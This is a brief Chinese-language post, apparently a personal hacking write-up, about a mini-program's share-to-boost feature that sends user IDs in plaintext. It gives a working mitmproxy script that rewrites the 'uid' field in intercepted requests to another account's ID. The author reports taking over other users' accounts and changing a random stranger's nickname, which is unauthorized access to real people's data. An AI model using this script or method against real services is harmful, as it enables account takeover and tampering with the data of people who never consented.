助力玩法如下
[url=]image-20241104134623869.png[/url]
转发到群里,别人点进去就算助力成功
[url=]image-20241104134709385.png[/url]
浅浅抓个包,发现助力的jid(用户凭证)明文传输
[url=]image-20241104123656763.png[/url]
于是用mitmproxy写了个脚本
from mitmproxy import http
from multy_account.account import uid_list
def request(flow: http.HTTPFlow) -> None:
# pretty_host takes the "Host" header of the request into account,
# which is useful in transparent mode where we usually only have the IP
# otherwise.
if flow.request.pretty_host == "xxx.xxxxxx.com":
print(flow.request.url)
# print(flow.request.urlencoded_form['uid'])
if flow.request.urlencoded_form['uid']:
flow.request.urlencoded_form['uid'] = uid_list[2]
再次刷新小程序,成功获取到别人的账号
随机修改一位幸运观众的昵称 :D
javascript:;
